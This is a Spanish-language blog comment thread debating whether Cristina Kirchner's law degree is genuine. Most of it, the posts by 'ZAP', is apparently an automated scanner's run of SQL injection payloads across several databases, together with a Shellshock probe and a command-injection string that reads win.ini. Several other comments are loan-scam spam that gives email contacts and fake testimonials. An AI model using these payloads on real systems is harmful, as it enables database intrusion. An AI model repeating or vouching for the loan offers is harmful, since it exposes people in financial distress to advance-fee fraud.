    Creo que si quieren saber si es o no abogada no es tan difícil solo deben recurrir a los documentos de la universidad donde curso sus estudio y listo, claro que para corroborar dichos documentos se debe expedir la justicia y creo que dado la persona en cuestión dicha constatación debería ser con personal altamente calificado, de cualquier manera si no es abogado no importaría siempre y cuando no haya ejercido como tal o cobrado por lo que no es. De cualquier manera la gente que hace uso de títulos que nunca consiguió solo demuestra su estupidez al pensar que un titulo falso lo equipara con alguna clase en especial o lo hace superior al resto.

  108. Anónimo dice:

    Yo soy trapito, y tengo título.

  109. ZAP dice:

    ” AND “1”=”1

  110. ZAP dice:

    ) UNION ALL select NULL —

  111. ZAP dice:

    ‘&type %SYSTEMROOT%\win.ini&’

  112. ZAP dice:

    DDLKBwsqkEVQgvDAqLHtoWesZpIEGqDlPZfNLQcDfwIewTGcRmCXTxSBuJaFlxftGlsJmGWeKicPAnlrBYHxoVJnTtmFKEYVQtthfcBGVGlDSaIVeWQbOZPrnqAHqCdkxPsShYdPpdJBhedwqbEqvqEhhIqLhInWqJCsGJsgodfqshPFdKiTXltGAJxBeVGQhUHtdVdqGFvwkWhvkaNfjEhJEwbYynfnmZnhpKMFtOQSejMBcREPsQBwHQtENhqrYSJkDyqWftCwtCZXoGtWAibsKWfnwNscothiqseanDsIQVqOOsNQYpIlGnaeILYedaEVNbbeowxCklboTcBJAcwOptIdEeVOmKyRsycVKenmFLNNcqVCswCUhJDNggxBUjmmCFYQHhtLLAtaWFpkHaxWyblxQnqRwhNERyblZPwmKitYJCoJNchsoHOxKPMkrSFSiCqcVLcIBXKlbahUjygWljpsJXFBTpqdNniIxNHAFfJHxZWOvLiVaRuHlRfOCMCyCFJmiaVVQAHrGbmpdMGpApyrKpYRPqjGDxRPZoalcMtQkgDkggJfJwRXJbLhuDjdismwDDtlTVCcbXssldocHDLbGEwmKRegEvDSeaUbHOIEpsmWHXVQLcGclCilemSWHYGbBHYptJCrylRUZRTJTlaTEUkvriaCGpyjvswaWFpDSmbBVgXlKXdOOieqWHfeRhkohhuZapJbpuyPjthPLkyvFmFYCeOjYCUJLEmjOqakuRpnZTuhqEtdAJfMbmXcpuNGQGBABdGaHRmYNHgMDCZFgeJrXMQkSnIpXWSbBubgnySGsYmLgKChEEjBFFWlLiPPsQCcUsgDVbpKGMNiDNQWxupgJGPXfXAsjsEgHeqPtBOhWBnTZrtkEBvphjbXxpqdLxulICPAbpmjaiJfQFdxnSpTZnamPGVRxaMhxQMXmRwVIFeCLWmjelGJvigWmVaTCjXBpEGKhZMcmMjupVenuiBOBvGbcIoFRukkYwlxuQiiheNUFbQlfnQSfGEIgqafLtkJYLKFXWExfMiyhkPdpUZIdqUCAkOunSloYXrZKShUmjZZljvjHZFHQDGnSTMbgtZeDJlanqoZCtsajvmHjatMbfhDtZCXQBlyZrYjHJPriLNdCqdmgqVEIsXVUrWXkvneYCcVrNsrTUlrVpGgVRcaBfnjBQNvOiduUcrpQWZSoLvLyblJTyZmvvvabqqZKERNJQJFsQQWwqCZODLcLSQJgWSyQXjCvFuutsFoDLVugolGxWdMutdWpcHGQDAwYCukgnrToEZukPnJaQxQJrqqBIATOWtYlHTQleCoNYikawDIYmmyUaDvpxutyHsaWPEUxUuVkDyimSyDfeEkkuRjpVqZUmYOXWDAdjlKhchXvnKpPivqfJYxqMVxMBKIxKHvIGXCxcZFyWsILCEZmZZGPjsPCfJpAeCXyXFWgykCjsYXGqsrvHYCNwxAuuNffIjgTPCCSNHAfrsEkHYtYFToJBcZnVIAxHAmecHRKxgWqmehHYhXOkEYYJQkhmxnKVBSVheQUBiaEUDnvrFZEfruvqMtQBIePYoTOGwDnkjbeHHAlkNmmEIaaxwxDNJKfibXxtlFsltZquQlgFHjMPEJYBoRVPRLoVHFDrgQEflReUGhrRAkhITJbmeHGDJVcHANbCKKDJaThrVqBHRmucmNASbDVdyZljhSNQtNbZifIKYqVauYyOjNulJBpiMdCWUOEgKxQVyHLNjeWNLvAGuCRbSWMaAKEQYBebBZuqVlGfmIoTabWrDWiMZKXTsljfZPtpAIaQOuOceqduIZwqLORJCBPbSqKMEpuoPRRZyODnsndGHfRlUdAeqOqsTcaQvpNWUCjKVHAXsWGVCBEdSHDrOlSWbZITNPxVussDMxbxyerayWXocCdCCXtYUTXqlPkmiVwWGGqByWyxeoYmoKojpcionWmXYAaFAgoykjZJmhiSioBXfQgrgVrQLvmmSwgjXraCZKOJEKUGgiFoFrZUJpUTpCKyYFbNDHSyieVPPLoKBoJycliskiMilnjYGQuERpqkeKvajKGMcpSBjHcoUIjJuVGidfFZbZbvLw

  113. ZAP dice:

    () { :;}; echo ‘X-Powered-By: ShellShock-Vulnerable’

  114. ZAP dice:

    ; select “java.lang.Thread.sleep”(5000) from INFORMATION_SCHEMA.SYSTEM_COLUMNS where TABLE_NAME = ‘SYSTEM_COLUMNS’ and COLUMN_NAME = ‘TABLE_NAME’ —

  115. ZAP dice:

    (SELECT UTL_INADDR.get_host_name(‘10.0.0.1’) from dual union SELECT UTL_INADDR.get_host_name(‘10.0.0.2’) from dual union SELECT UTL_INADDR.get_host_name(‘10.0.0.3’) from dual union SELECT UTL_INADDR.get_host_name(‘10.0.0.4’) from dual union SELECT UTL_INADDR.get_host_name(‘10.0.0.5’) from dual)

  116. ZAP dice:

    ) AND 9633=7437 AND (5646=5646

  117. ZAP dice:

    ‘) AND 4608=6794 AND (‘Dbku’=’Dbku

  118. ZAP dice:

    ‘ AND 3829=6019 AND ‘wsMd’=’wsMd

  119. ZAP dice:

    %’ AND 1456=2466 AND ‘%’=’

  120. ZAP dice:

    %’ AND 6216=6216 AND ‘%’=’

  121. ZAP dice:

    (SELECT (CASE WHEN (3739=6937) THEN 3739 ELSE 3739*(SELECT 3739 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))

  122. ZAP dice:

    (SELECT (CASE WHEN (5503=5503) THEN 5503 ELSE 5503*(SELECT 5503 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))

  123. ZAP dice:

    AND 1954=CAST((CHR(58)||CHR(104)||CHR(101)||CHR(116)||CHR(58))||(SELECT (CASE WHEN (1954=1954) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(116)||CHR(111)||CHR(106)||CHR(58)) AS NUMERIC)

  124. ZAP dice:

    ‘) AND 6695=CONVERT(INT,(SELECT CHAR(58)+CHAR(104)+CHAR(101)+CHAR(116)+CHAR(58)+(SELECT (CASE WHEN (6695=6695) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(116)+CHAR(111)+CHAR(106)+CHAR(58))) AND (‘FefB’=’FefB

  125. ZAP dice:

    %’ AND 5747=CONVERT(INT,(SELECT CHAR(58)+CHAR(104)+CHAR(101)+CHAR(116)+CHAR(58)+(SELECT (CASE WHEN (5747=5747) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(116)+CHAR(111)+CHAR(106)+CHAR(58))) AND ‘%’=’

  126. ZAP dice:

    ) AND 6584=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(104)||CHR(101)||CHR(116)||CHR(58)||(SELECT (CASE WHEN (6584=6584) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(116)||CHR(111)||CHR(106)||CHR(58)||CHR(62))) FROM DUAL) AND (8244=8244

  127. ZAP dice:

    AND 5374=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(104)||CHR(101)||CHR(116)||CHR(58)||(SELECT (CASE WHEN (5374=5374) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(116)||CHR(111)||CHR(106)||CHR(58)||CHR(62))) FROM DUAL)

  128. ZAP dice:

    ‘) AND 4178=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(104)||CHR(101)||CHR(116)||CHR(58)||(SELECT (CASE WHEN (4178=4178) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(116)||CHR(111)||CHR(106)||CHR(58)||CHR(62))) FROM DUAL) AND (‘pJZQ’=’pJZQ

  129. ZAP dice:

    ‘ AND 1124=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(104)||CHR(101)||CHR(116)||CHR(58)||(SELECT (CASE WHEN (1124=1124) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(116)||CHR(111)||CHR(106)||CHR(58)||CHR(62))) FROM DUAL) AND ‘eOmZ’=’eOmZ

  130. ZAP dice:

    %’ AND 4083=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(104)||CHR(101)||CHR(116)||CHR(58)||(SELECT (CASE WHEN (4083=4083) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(116)||CHR(111)||CHR(106)||CHR(58)||CHR(62))) FROM DUAL) AND ‘%’=’

  131. ZAP dice:

    (SELECT 2542 FROM(SELECT COUNT(*),CONCAT(0x3a6865743a,(SELECT (ELT(2542=2542,1))),0x3a746f6a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

  132. ZAP dice:

    (SELECT (CHR(58)||CHR(104)||CHR(101)||CHR(116)||CHR(58))||(SELECT (CASE WHEN (2585=2585) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(116)||CHR(111)||CHR(106)||CHR(58)))

  133. ZAP dice:

    (SELECT CHAR(58)+CHAR(104)+CHAR(101)+CHAR(116)+CHAR(58)+(SELECT (CASE WHEN (5198=5198) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(116)+CHAR(111)+CHAR(106)+CHAR(58))

  134. ZAP dice:

    );(SELECT * FROM (SELECT(SLEEP(5)))wcyF)#

  135. ZAP dice:

    ;(SELECT * FROM (SELECT(SLEEP(5)))sGLD)#

  136. ZAP dice:

    ‘);(SELECT * FROM (SELECT(SLEEP(5)))cZSM)#

  137. ZAP dice:

    %’;(SELECT * FROM (SELECT(SLEEP(5)))Dzjs)#

  138. ZAP dice:

    );SELECT PG_SLEEP(5)–

  139. ZAP dice:

    ‘);SELECT PG_SLEEP(5)–

  140. ZAP dice:

    ‘;SELECT PG_SLEEP(5)–

  141. ZAP dice:

    ‘;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)–

  142. ZAP dice:

    );SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(97)||CHR(112)||CHR(118),5) FROM DUAL–

  143. ZAP dice:

    ;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)||CHR(73)||CHR(115)||CHR(114),5) FROM DUAL–

  144. ZAP dice:

    ‘);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(87)||CHR(87)||CHR(110),5) FROM DUAL–

  145. ZAP dice:

    ‘;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(78)||CHR(87)||CHR(74),5) FROM DUAL–

  146. ZAP dice:

    ;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(86)||CHR(103)||CHR(67)||CHR(119),5) FROM DUAL–

  147. ZAP dice:

    AND 2292=(SELECT 2292 FROM PG_SLEEP(5))

  148. ZAP dice:

    ) UNION ALL SELECT NULL–

  149. ZAP dice:

    ) UNION ALL SELECT NULL,NULL,NULL,NULL–

  150. ZAP dice:

    ) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL–

  151. ZAP dice:

    ) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL–

  152. ZAP dice:

    ) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL–

  153. ZAP dice:

    ) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL–

  154. ZAP dice:

    ) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL–

  155. ZAP dice:

    UNION ALL SELECT NULL–

  156. ZAP dice:

    UNION ALL SELECT NULL,NULL,NULL,NULL–

  157. ZAP dice:

    UNION ALL SELECT NULL,NULL,NULL,NULL,NULL–

  158. ZAP dice:

    UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL–

  159. ZAP dice:

    UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL–

  160. ZAP dice:

    UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL–

  161. ZAP dice:

    UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL–

  162. ZAP dice:

    UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL–

  163. ZAP dice:

    ‘) ORDER BY 1–

  164. ZAP dice:

    ‘) UNION ALL SELECT NULL–

  165. ZAP dice:

    ‘) UNION ALL SELECT NULL,NULL–

  166. ZAP dice:

    ‘) UNION ALL SELECT NULL,NULL,NULL–

  167. ZAP dice:

    ‘) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL–

  168. ZAP dice:

    ‘) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL–

  169. ZAP dice:

    ‘) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL–

  170. ZAP dice:

    ‘) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL–

  171. ZAP dice:

    ‘ UNION ALL SELECT NULL,NULL–

  172. ZAP dice:

    ‘ UNION ALL SELECT NULL,NULL,NULL–

  173. ZAP dice:

    ‘ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL–

  174. ZAP dice:

    ‘ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL–

  175. ZAP dice:

    ‘ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL–

  176. ZAP dice:

    ‘ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL–

  177. ZAP dice:

    %’ ORDER BY 1–

  178. ZAP dice:

    %’ UNION ALL SELECT NULL–

  179. ZAP dice:

    %’ UNION ALL SELECT NULL,NULL–

  180. ZAP dice:

    %’ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL–

  181. ZAP dice:

    %’ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL–

  182. ZAP dice:

    %’ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL–

  183. ZAP dice:

    %’ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL–

  184. ZAP dice:

    %’ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL–

  185. ZAP dice:

    %’ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL–

  186. Anónimo dice:

    Si la yegua de Cristina que recargo el país No es abogada que vaya en cana por usurpación de títulos y por dejar un tendal de deudas

  187. drosch dice:

    Bienvenido a Drosch Préstamo Service Company (un servicio personalizado para todas sus necesidades financieras) Nosotros, los proveedores del servicio de préstamo Drosch ofertas de préstamo a una tasa de interés muy baja de 3%, ofrecemos préstamos personales, préstamos de consolidación de deuda, capital de riesgo, préstamo de negocios, educativos préstamo, préstamo de vivienda, y de préstamo por cualquier motivo y necesidades urgentes !. con una duración máxima de 10 años. ¿Ha sido rechazado por su banco? ¿Tiene mal crédito? ¿Tiene cuentas sin pagar? Está usted en deuda? ¿Es necesario establecer un negocio? No se preocupe más ya que estamos aquí para ofrecerle un préstamo a bajo interés. Nuestro préstamo oscila entre $ 5,000.00 a $ 50, 000,000.00 También prestamos en EE.UU. DÓLARES y Euros !! REMITIDO A ESTE CORREO ELECTRÓNICO: e.droschklaus@gmail.com para más información.

  188. Carlo dice:

    Salió el certificado analitico ayer en infobae.Chau murió esto.

  189. Pulqui dice:

    Héctor, nos engañaste. Resulta que es chorra y boga……!

  190. Pulqui dice:

    Y si NO es boga, los jueces Federales son corruptos…..

  191. Sucundrule dice:

    Che Mr. Bond, ¿Le pifiaste ó Bonodio la cubrió? Queremos más chusmerío. Igual creo que cualquiera con plata e influencias se puede sacar un título de boga. Hay tantos abogangsters por la yeca…!!!

  192. TESTIMONIO SOBRE CÓMO obtuvó ONU Préstamo De Una Compañía de Préstamo GENUINO Semana Pasada.

    La soja Danny Meister por su nombre. Yo vivo en EE.UU., quiero Como utilizar this medio para alertar a todos los solicitantes de Préstamos Que Tener Mucho Cuidado Porque hay estafadores everywhere.Few meses Atrás yo era tensa financieramente, y DEBIDO a mi me Desesperación estafado por Varios Prestamistas en línea ahora. Casi habia perdido la esperanza Hasta Que un Amigo me refirió una prestamista- muy fiable Llamada señora Betty ONU Mabel A que me presta la ONU Préstamo sin garantía de $ 150,000.00 Dólares en la última semana 7 horas pecado ningún tipo de estrés. Si Usted está en Necesidad de CUALQUIER tipo de prestamo Solo en contacto con ella un Través de e-mail: betty.mabel227@gmail.com

  193. ¿Necesitas un préstamo?????? en caso afirmativo amablemente se aplican ahora a través de correo electrónico: danielsawiak1@gmail.com

  194. grace tessy dice:

    Hola a todos,

    Am Grace Tessy de SOUTH AFRICA, nunca pensé que vendría un día que estaré libre de todos mis problemas hasta que conozco al Sr. Jack Walman, un prestamista que es fiel a todas sus palabras. Me encuentro con él en el momento muy difícil de mi vida después de que me timaron casi todos mis ahorros por los prestamistas falsos, y cuando me encuentro con el Sr. Jack me ayudó a obtener el préstamo de su empresa en sólo 24 horas.
    Si quieres un préstamo legítimo, te aconsejo que lo contactes, él es real. Su correo electrónico: jackwalman993@gmail.com?

  195. Pakin dice:

    Los que hacen estas publicaciones hacen quedar mal a la facultad de derecho de la UNLP en la cual casi siempre fue manejada por los radicales lease franja morada,, Poniendo ganzadas hacen creer a la gente que un titulo expedido por una facultad publica se puede truchar alegremnte. Son montones los recaudos que se toman desde la facultad y la universidad. Haciendo el caldo gordo a la universidades privadas que ahí si reglan los títulos con tal que paguen la fastuosas cuota. Los egresados de la UNLP sea cual sea la banderia política tenemos que rechazar estas publicaciones falsas que hieren el honor de tan prestigiosa universidad.

  196. Mrs villegas dice:

    Buen día

    ¿Es usted necesita un crédito urgente! ¿Está usted en algún tipo de dificultades financieras? ¿Necesita un crédito claro sus deudas? ¿Es usted un hombre de negocios o una mujer que necesita fondos para expandir su negocio? Ofrecemos crédito rápido y asequible a una tasa de interés muy baja del 3%, para más información envíenos un correo electrónico ahora ……. elizabethvillegas600@gmail.com

Deja un comentario

Tu dirección de correo electrónico no será publicada.